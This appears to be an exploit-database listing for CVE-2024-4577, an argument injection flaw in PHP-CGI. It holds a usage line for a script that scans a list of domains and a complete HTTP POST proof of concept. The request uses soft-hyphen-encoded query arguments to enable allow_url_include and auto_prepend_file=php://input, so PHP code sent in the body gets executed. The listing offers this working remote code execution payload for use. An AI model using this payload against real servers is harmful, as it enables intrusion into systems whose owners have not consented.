Exploit for OS Command Injection in Php CVE-2024-4577

Name: Exploit for OS Command Injection in Php CVE-2024-4577
Rating: 5 (452 reviews)

2024-06-07 | CVSS 9.8

## https://sploitus.com/exploit?id=29ADD662-894D-5979-B1F9-25A61F702889
# CVE-2024-4577, Argument Injection in PHP-CGI
```
./CVE-2024-4577.sh /path/to/domains-list

```
# POC : 
```
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?> 

```
![448002152_980199013569536_7597209283143282849_n](https://github.com/11whoami99/CVE-2024-4577/assets/122907550/5a9a4dab-7621-4db9-9bc4-7ab2de977822)